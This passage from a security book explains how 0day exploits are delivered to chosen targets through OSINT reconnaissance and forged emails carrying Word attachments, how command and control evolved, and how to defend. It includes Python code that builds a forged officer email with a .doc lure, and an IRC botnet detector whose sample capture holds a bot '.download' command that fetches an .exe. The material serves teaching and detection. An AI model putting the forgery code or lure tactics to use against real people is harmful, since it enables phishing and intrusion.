Delivery of targeted attacks

Once the attacking organization has discovered and developed a reliable exploit for a 0day vulnerability, it moves on to the target-selection phase. Target selection is usually driven by two considerations: the value of the information a particular target will yield and the difficulty of successful exploitation (including the likelihood of detection). 0day exploits are often deployed against personnel who hold security clearances, are directly responsible for handling sensitive data, or can provide a stepping stone into a targeted organization, which makes high-ranking officials attractive targets. The cost of developing a reliable exploit for popular software is high, and sophisticated organizations deploy 0day exploits only against targets that will yield a solid return on that investment. They are also careful to avoid detection, because once a 0day is detected it quickly loses value: patches are developed and specific countermeasures are put in place. The technical sophistication and reliability of the exploit greatly affect the likelihood of detection; an exploit that crashes the application or leaves the system unstable draws attention, whereas one that exits cleanly does not.

Once the exploit has been chosen and the target selected, the attacker must deliver the exploit to the target. One of the most popular delivery methods for 0day exploits is email. Email is the lifeblood of many organizations, allowing for the exchange of information in an effective and convenient manner. Virtually every email gateway blocks dangerous file types such as executables (.exe), batch files (.bat), and scripts (.vbs), but almost every one allows Word documents (.doc) and other Office documents through, because those filters key on the file type rather than on what the bytes inside a permitted type actually do. In this case, the attacker delivers the exploit hidden deep inside a Word document, allowing it to travel unabated through the victim organization’s networks to the intended target.

Sophisticated attackers do not simply identify the email address of the target and send away; extensive reconnaissance is done before the actual exploit is sent. Collecting upcoming travel agendas, known associates, naming conventions for documents, and other details helps build credibility and increases the likelihood of a successful exploit. Much of this information can be gleaned from public sources such as Google or public websites. Figures 10-4 and 10-5 show some of the types of information that can be retrieved about high-profile targets with open source intelligence (OSINT).

Figure 10-4. Sensitive information found via OSINT

Figure 10-5. Contact information for military units found through OSINT

Sophisticated organizations use OSINT and traditional intelligence-gathering methods to collect a good operational “picture” of the target. For example, if an attacker has identified a commanding officer (CO) of a unit within one of the US military branches as the target, he would spend time enumerating several associates who work closely with the CO. If the attacker has obtained a list of contacts (like the one shown in Figure 10-5), he could contact various members of the CO’s staff, collecting bits of intelligence to paint the operational picture surrounding him. Pieces of information that would be valuable to an attacker include upcoming events, email addresses of associates, names and nicknames of associates, and other contact information related to the target and associates.

Once the attacker has collected intelligence on the target and the target’s associates, he can build a convincing scenario for attack. For example, after the attacker enumerates the email addresses associated with the various associates of the CO, he can forge an email that appears to come from an associate related to an upcoming event. An example email is shown in Figure 10-6.

Figure 10-6. Forged email that appears to have originated from a trusted source

Simple email forgery is easily done with a custom SMTP server: the From header is just text the sender chooses, and unless the receiving domain checks SPF, DKIM, or DMARC, nothing ties it to the server that actually submitted the message. Several programming languages provide simple APIs that can be used to forge emails, making them appear to come from any source the attacker chooses.
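The following added example (not the book’s code) shows both sides of the forgery described above, using Python’s standard email and smtplib modules. It builds the kind of message shown in Figure 10-6, with a From header naming an associate found during reconnaissance and a .doc attachment, and then applies the one check a receiving gateway can make without cryptographic mail authentication: whether the domain in the From header matches the domain of the SMTP envelope sender. The names, addresses, hostnames and attachment bytes are all constructed; the relay submission function is included to show where a custom SMTP server enters the picture but is not invoked.

```python
"""Forge a message with a Word attachment and show the header check that
exposes it. Added example; addresses, hostnames and attachment bytes are
constructed for illustration."""
import smtplib
from email.message import EmailMessage
from email.utils import formatdate, make_msgid, parseaddr

# Constructed stand-in for the weaponized document: real CFB magic, empty body.
FAKE_DOC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" + b"\x00" * 504


def build_forged_message(display_from, to_addr, subject, body, attachment, filename):
    """Assemble a MIME message whose From header is whatever the attacker types."""
    msg = EmailMessage()
    msg["From"] = display_from      # shown to the recipient; nothing verifies it
    msg["To"] = to_addr
    msg["Subject"] = subject
    msg["Date"] = formatdate(localtime=True)
    # Message-ID minted under the impersonated domain so it looks locally generated
    msg["Message-ID"] = make_msgid(domain=parseaddr(display_from)[1].rpartition("@")[2])
    msg.set_content(body)
    # Gateways that block .exe/.bat/.vbs almost always pass application/msword
    msg.add_attachment(attachment, maintype="application", subtype="msword",
                       filename=filename)
    return msg


def send_via_relay(msg, relay_host, envelope_from, port=25):
    """Submit through an SMTP server the attacker controls (not called here).
    The envelope sender (MAIL FROM) can differ freely from the From header."""
    with smtplib.SMTP(relay_host, port) as smtp:
        smtp.send_message(msg, from_addr=envelope_from)


def attachment_summary(msg):
    """What a mail filter sees: attachment names and declared MIME types."""
    return [(p.get_filename(), p.get_content_type()) for p in msg.iter_attachments()]


def header_envelope_mismatch(msg, envelope_from):
    """Defender-side check: From-header domain differs from envelope-sender domain.
    This is the misalignment SPF/DMARC checks catch; without them the recipient
    sees only the forged header."""
    hdr_domain = parseaddr(msg["From"])[1].rpartition("@")[2].lower()
    env_domain = parseaddr(envelope_from)[1].rpartition("@")[2].lower()
    return hdr_domain != env_domain


def demo():
    """Build the lure: an 'agenda' from a staff officer enumerated via OSINT."""
    msg = build_forged_message(
        "LCDR J. Smith <jsmith@staff.example>",      # constructed associate
        "co@unit.example",                           # constructed target
        "Agenda for Thursday planning conference",
        "Sir,\n\nAttached is the revised agenda for Thursday.\n\nV/R,\nJ. Smith",
        FAKE_DOC, "Planning_Conference_Agenda.doc")
    envelope_from = "bounce@attacker.example"        # what the relay actually says
    return msg, envelope_from


if __name__ == "__main__":
    message, envelope = demo()
    print(message.as_string()[:400])
    print("attachments:", attachment_summary(message))
    print("header/envelope mismatch:", header_envelope_mismatch(message, envelope))
```

The mismatch check is only useful at the receiving gateway, where the envelope sender is visible; by the time the message reaches the user’s inbox, all that remains is the From header the attacker wrote.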

Once the email is sent, it becomes a weapon. The Word document attached to the mail carries a payload that infects anyone who opens it. Signature-based intrusion-detection systems and anti-virus software cannot detect the attack, because no signature for it exists yet: only the attacker knows the structure of the exploit, since it is a 0day.

Once the unsuspecting victim opens the Word document, he is silently infected, and all the data on his system is compromised. The attacker then installs a rootkit on the infected system, allowing unfettered future access. These rootkits are sophisticated and can hide from most detection mechanisms. As detection routines improve, so does the rootkit’s evasion logic, creating a dangerous game of cat and mouse, with the victim’s data as the prize.

Command, control, and exfiltration of data

Ten years ago, detecting an infected system was relatively simple. The majority of infected systems simply connected back to an attacker and requested commands to execute. Unencrypted communication channels were commonly used to control infected systems, so exfiltration of sensitive data was easily spotted by intrusion-detection teams. Connections back to IRC servers in foreign countries were a telltale sign that a system was compromised, and monitoring of clear-text communications from infected systems was even used in intelligence and counterintelligence efforts. Figure 10-7 shows a small portion of captured IRC communications from antiquated malware.

Figure 10-7. Clear-text command and control communication from malware
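The detection this paragraph describes was largely a matter of reading payloads such as those in Figure 10-7. The following added example (not from the book) shows that logic written down: it reads a constructed capture of clear-text TCP payloads, recognizes IRC protocol traffic regardless of port, groups it into sessions, and escalates a session to a command-and-control verdict when it sees the bot-style nickname pattern and herder commands typical of the era. The line format, addresses, nick pattern and command list are constructed assumptions for illustration; a real sensor would feed this from a pcap or an IDS alert stream.

```python
"""Flag IRC-style command and control in captured clear-text TCP payloads.
Added example. Capture format ("src:port -> dst:port  payload"), addresses,
nick pattern and bot-command list are constructed for illustration."""
import re
from collections import defaultdict

# Constructed capture: a workstation talking IRC on a non-standard port, and
# one ordinary HTTP request that must not be flagged.
SAMPLE_CAPTURE = """\
10.1.2.33:49152 -> 203.0.113.7:8080  NICK [USA|XP|04412]
10.1.2.33:49152 -> 203.0.113.7:8080  USER xp 0 0 :xp
203.0.113.7:8080 -> 10.1.2.33:49152  :irc.example 001 [USA|XP|04412] :Welcome
10.1.2.33:49152 -> 203.0.113.7:8080  JOIN #bots key123
203.0.113.7:8080 -> 10.1.2.33:49152  :op!op@bot.example TOPIC #bots :.download http://203.0.113.7/u.exe
10.1.2.33:49152 -> 203.0.113.7:8080  PRIVMSG #bots :[DOWNLOAD]: File download: 183 KB
10.1.2.33:49153 -> 198.51.100.20:80  GET /index.html HTTP/1.1
"""

LINE_RE = re.compile(
    r"^(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<payload>.*)$")
IRC_COMMANDS = {"NICK", "USER", "JOIN", "PRIVMSG", "NOTICE", "TOPIC", "PING", "PONG", "PART", "QUIT"}
# Herder commands typical of IRC-controlled bots of that era (illustrative, not exhaustive)
BOT_COMMAND_RE = re.compile(r"(?:^|\s):?[.!](?:download|update|ddos|syn|scan|exec)\b", re.I)
# Bots often announced themselves with nicks like [COUNTRY|OS|number]
BOT_NICK_RE = re.compile(r"^\[[A-Z]{2,3}\|[^\]]+\|\d+\]$")
IRC_STANDARD_PORT = 6667


def irc_command(payload):
    """Return the IRC command word of a payload, or None if it does not look like IRC."""
    words = payload.split()
    if not words:
        return None
    if words[0].startswith(":") and len(words) > 1:   # strip server/user prefix
        words = words[1:]
    cmd = words[0].upper()
    if cmd in IRC_COMMANDS or (len(cmd) == 3 and cmd.isdigit()):  # numeric replies
        return cmd
    return None


def analyze(capture):
    """Group IRC payloads by endpoint pair and return one finding per IRC session."""
    sessions = defaultdict(lambda: {"irc_lines": 0, "bot_nick": False, "bot_commands": []})
    for line in capture.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        cmd = irc_command(m["payload"])
        if cmd is None:
            continue
        # Sort the endpoints so both directions of a conversation share one key
        key = tuple(sorted([f"{m['src']}:{m['sport']}", f"{m['dst']}:{m['dport']}"]))
        s = sessions[key]
        s["irc_lines"] += 1
        if cmd == "NICK":
            parts = m["payload"].split(None, 1)
            s["bot_nick"] = bool(len(parts) > 1 and BOT_NICK_RE.match(parts[1]))
        if cmd in ("TOPIC", "PRIVMSG", "NOTICE") and BOT_COMMAND_RE.search(m["payload"]):
            s["bot_commands"].append(m["payload"])

    findings = []
    for key, s in sessions.items():
        if s["irc_lines"] < 2:           # a lone word that happens to match is noise
            continue
        ports = {int(ep.rsplit(":", 1)[1]) for ep in key}
        verdict = "c2" if (s["bot_nick"] or s["bot_commands"]) else "irc"
        findings.append({
            "endpoints": key,
            "irc_lines": s["irc_lines"],
            "nonstandard_port": IRC_STANDARD_PORT not in ports,
            "bot_nick": s["bot_nick"],
            "bot_commands": s["bot_commands"],
            "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_CAPTURE):
        print(f["verdict"], f["endpoints"], f["bot_commands"])
```

Matching on protocol content rather than on port 6667 is what makes this catch the session on port 8080; the same idea, applied to the encrypted and HTTP-borne traffic described next, is where it stops working.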

Today’s malware is more sophisticated and more covert. Generally speaking, today’s most sophisticated malware is never written to disk; it resides only in the system’s memory, which makes the forensics effort extremely difficult. Researchers from Core Security Technologies and researcher John Heasman from NGSSoftware Insight Security Research have demonstrated practical examples of how memory-resident and PCI-based rootkits can be deployed against targets.

Additionally, gone are the days when compromised systems transmitted stolen data in the clear, directly back to the attackers’ systems. Today’s sophisticated malware goes to great lengths to hide its communications and intentions. Encrypted commands, communication over HTTP, decentralized command and control, and exfiltration of data through covert channels are the norm. Take, for example, the advanced versions of the Nugache malware. Researchers Dave Dittrich of the University of Washington and Sven Dietrich of the Stevens Institute of Technology studied Nugache and showed that it used 256-bit Rijndael to encrypt its peer-to-peer command and control traffic. Because the cryptography was implemented properly, the researchers were able to decrypt the data flow in only one direction, even after gaining full access to the runtime in-memory data structures.

Why client-side 0day vulnerabilities can be so devastating

Client-side exploits target software installed on a victim’s system. Web browsers, web browser plug-ins (Java, Flash, Silverlight, etc.), word-processing software, PDF readers, and even the operating system itself are all considered client-side software. On the other hand, server-side software includes web and email servers.

Client-side 0day exploits have gained popularity with organizations employing offensive operations. Discovering vulnerabilities in a popular client-side component affects millions of users, and the research required to discover them can be done covertly, with no external indication that it is being conducted. Once a client-side vulnerability is discovered and an exploit is developed, the attacker has a weapon, ready to be deployed at a moment’s notice.

Client-side exploitation carries with it several advantages for the attacker. First, once the exploit is developed, the attacker typically has a multitude of delivery mechanisms available (web pages, Word documents, PDFs, Flash files, etc.), many of which are allowed through the firewall. For example, virtually all corporate firewalls allow their users to browse web pages and receive email. This gives attackers the ability to circumvent perimeter security measures such as firewalls and virtual private networks (VPNs), because the exploit rides in on traffic the perimeter is designed to permit. As mentioned in previous sections, anti-virus technology simply cannot keep up with known threats, much less 0day exploits of which it has no knowledge.

Once attackers successfully exploit a client-side vulnerability, they not only gain access to all the data and information located on the compromised system, they also gain access to all the resources available to it. For example, if the compromised system is part of a larger network, the attacker gains access to that larger network. In this sense, the attacker uses the compromised machine as a stepping-stone for further attacks in the internal network. Often internal resources are not as well protected as Internet-facing resources, making them easy targets for attackers who have gained access to internal networks.

Protecting against 0day exploits

There is simply no specific defense against 0day exploits. Each 0day exploit is unique, and only the attacker knows the full details of the 0day vulnerability. However, there are some steps that an organization can take to minimize the damage done by 0day vulnerabilities.

Defense in Depth

There is simply no substitute for defense in depth. Defenses are layered, protecting sensitive data and critical systems through many different types of defense mechanisms. This forces the attacker to increase the intelligence-gathering effort needed for successful exploitation, as he must understand each defensive layer protecting the desired information. A solid defense-in-depth strategy also dramatically increases the sophistication and effort required for a successful exploit, as the attacker must now bypass many defenses and not just one. Defense in depth cannot guarantee safety from exploitation attempts by sophisticated attackers, but it does increase the attacker’s footprint and with it the likelihood of early detection.

Using technologies such as MOICE and virtualization

Office documents are becoming increasingly popular attack surfaces. Until Microsoft transitioned to an XML format for Office documents, files such as Microsoft Word (.doc), PowerPoint (.ppt), and Excel (.xls) documents were binary formats. Binary formats are tremendously challenging to parse and consume, opening up a large attack surface. There has been a surge in Microsoft Office-related exploits in the past few years due to Office’s popularity in large corporations and governments. To combat this rise, Microsoft developed the Microsoft Office Isolated Conversion Environment (MOICE) to help “reduce the security risk” of opening these documents. MOICE converts the traditional Office binary file format into the new Office Open XML format in an isolated environment before the document reaches Word, which helps remove threats hidden inside the binary contents; note that the converter itself still parses the untrusted binary, so this reduces rather than eliminates the risk. Technologies such as virtualization allow malicious code to be executed within controlled and constrained environments, so that when a 0day exploit is discovered, its characteristics and “signature” can be examined safely.

Note

Additional information related to the MOICE can be found on Microsoft’s support site at http://support.microsoft.com/kb/935865.

Physical separation between data of varying sensitivity

A common operational security measure within government and military networks is the physical separation of networks according to the classification of the data they carry. Unclassified information is physically separated from data marked SECRET, which is in turn separated from data marked TOP SECRET. Physical separation of data is one of the most effective means of reducing the attack surface for extremely sensitive data. It also carries significant operational overhead: the effort required for users to move between classified and unclassified networks can be high, especially in time-critical situations. Additionally, although separating the networks allows more stringent controls to be placed on those containing classified information, it also requires additional resources.

Resources are finite in every organization, which means building a robust set of defenses for classified networks will often come at a cost for the defenses for unclassified networks. Normally, the decision to allocate resources to classified networks as opposed to unclassified networks is clear cut, but in this day of OSINT and ubiquitous social media, a savvy collection of unclassified pieces can give an adversary a clear picture of classified operations.
